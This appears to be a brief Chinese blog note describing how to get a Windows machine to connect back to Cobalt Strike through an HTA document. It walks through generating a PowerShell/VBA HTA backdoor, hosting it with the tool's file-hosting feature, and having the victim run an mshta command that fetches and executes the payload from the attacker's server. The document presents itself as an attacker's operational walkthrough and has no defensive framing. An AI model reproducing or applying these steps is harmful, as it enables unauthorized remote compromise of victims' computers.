【笔记】CobaltStrike通过HTA文档实现Windows上线

发表于 更新于 阅读次数:

前言

CobaltStrike通过HTA文档实现Windows上线

攻击者生成木马

  • 攻击->生成后门->HTA文档

  • 选择监听器Method选择PowerShellVBA->生成

攻击者将木马放到文件服务器上

  • 攻击->Web钓鱼->文件托管

  • 选择文件->运行

  • 全选URL并复制->Ok

受害者执行木马

1
mshta http://<ip>:80/download/file.ext

完成